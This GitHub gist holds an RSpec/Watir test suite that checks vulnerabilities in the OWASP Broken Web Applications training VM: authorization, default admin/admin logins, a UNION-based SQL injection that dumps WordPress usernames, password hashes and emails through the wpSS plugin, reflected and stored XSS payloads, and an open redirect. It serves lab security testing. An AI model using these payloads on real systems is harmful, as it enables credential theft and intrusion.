Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
OWASP Broken Web Applications Application Vulnerability Unit Testing Watir-WebDriver Test
# encoding: utf-8
#http://code.google.com/p/owaspbwa/wiki/ProjectSummary
#http://sourceforge.net/apps/trac/owaspbwa/report/1
require 'rspec'
require 'watir-webdriver'
$BROKEN_WEB_APPS_HOST='http://owaspbwa'
describe 'OWASP Broken Web App: Wordpress' do
before(:all) do
@browser = Watir::Browser.new
end
after(:all) do
@browser.close
end
context "Without authenticating", :type=>'authorization' do
specify "I should be able to access the blog" do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/'
@browser.title.include?('Broken WordPress').should be_true
end
specify "I should be able to access the login page" do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
@browser.title.include?('Login').should be_true
end
specify "I should not be able to access the WordPress Admin page" do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
@browser.title.include?('Login').should be_true
end
end
context "After logging in as 'admin'," do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
@browser.text_field(:name,"log").set("admin")
@browser.text_field(:name,"pwd").set("admin")
@browser.button(:name,"submit").click
end
specify "the page should list 'admin' as the authenticated user" do
@browser.strong(:text, /admin/i).text.should eq('admin')
end
specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
@browser.title.include?('Dashboard').should be_true
end
specify "I should be able to access the User Admin page", :type=>'authorization' do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/users.php'
@browser.title.include?('Users').should be_true
end
context 'After logging out, visiting the login page, and pressing the down arrow', :type=>'autocomplete' do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
@browser.text_field(:name,/log/i).send_keys(:arrow_down)
@browser.text_field(:name,/log/i).send_keys(:arrow_down)
@browser.text_field(:name,/log/i).send_keys(:return)
end
specify "I shold see autocompleted usernames" do
@browser.text_field(:name,/log/i).value.should_not be_nil
@browser.text_field(:name,/log/i).value.should_not eq('')
@browser.text_field(:name,/log/i).value.length > 0
end
end
end
context "After logging in as 'user'," do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-login.php'
@browser.text_field(:name,"log").set("user")
@browser.text_field(:name,"pwd").set("user")
@browser.button(:name,"submit").click
end
specify "the page should list 'user' as the authenticated user" do
@browser.strong(:text, /user/i).text.should eq('user')
end
specify "I should be able to access the 'wp-admin' page", :type=>'authorization' do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/'
@browser.title.include?('Dashboard').should be_true
end
specify "I should be not able to access the User Admin page", :type=>'authorization' do
@browser.goto $BROKEN_WEB_APPS_HOST+'/wordpress/wp-admin/users.php'
@browser.html.include?('You do not have sufficient permissions to access this page.').should be_true
end
end
context 'On the ss_load.php page,', :type=>'sqli' do
context 'When I enter a single quote into the ss_id URL parameter,' do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+"/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id='"
end
specify 'The application should respond with an SQL error message' do
@browser.html.include?("You have an error in your SQL syntax").should be_true
end
end
context 'When I enter an SQL Injection Payload,' do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+%q|/wordpress/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--|
end
specify "I should see the 'admin' account details" do
@browser.div(:id,'s1_spreadsheetBars').text.include?('admin@example.org').should be_true
end
end
end
end
describe 'OWASP Broken Web App: AWStats' do
before(:all) do
@browser = Watir::Browser.new
end
after(:all) do
@browser.close
end
context "When entering an XSS payload into the 'editList.php' page, ",:type=>'xss' do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+%q|/gtd-php/editList.php?listTitle=<script>alert('Achieved JavaScript Context')</script>|
end
specify 'An alert box should be displayed' do
expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
end
end
context "When entering an XSS payload into the 'newChecklist.php' page", :type=>'stored_xss' do
before(:all) do
@browser.goto $BROKEN_WEB_APPS_HOST+'/gtd-php/newChecklist.php'
@browser.text_field(:name,'title').set %q|"><script>alert(1)</script>|
@browser.text_field(:name,'description').set 'asdf'
@browser.button(:name,'submit').click
end
specify 'I should see an alert box after submitting the form' do
expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
end
context "When visiting the 'listChecklist.php' page, " do
specify 'I should see an alert box' do
expect { @browser.driver.switch_to.alert.accept }.to_not raise_error
end
end
end
context "When visiting the 'awredir.pl' page and specifying a 'url' of 'google.com', ", :type=>'open_redirect' do
before(:all) { @browser.goto ($BROKEN_WEB_APPS_HOST+'/awstats/awredir.pl?url=google.com') }
specify "The browser should be redirected to 'google.com'" do
@browser.title.should eq('Google')
end
end
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment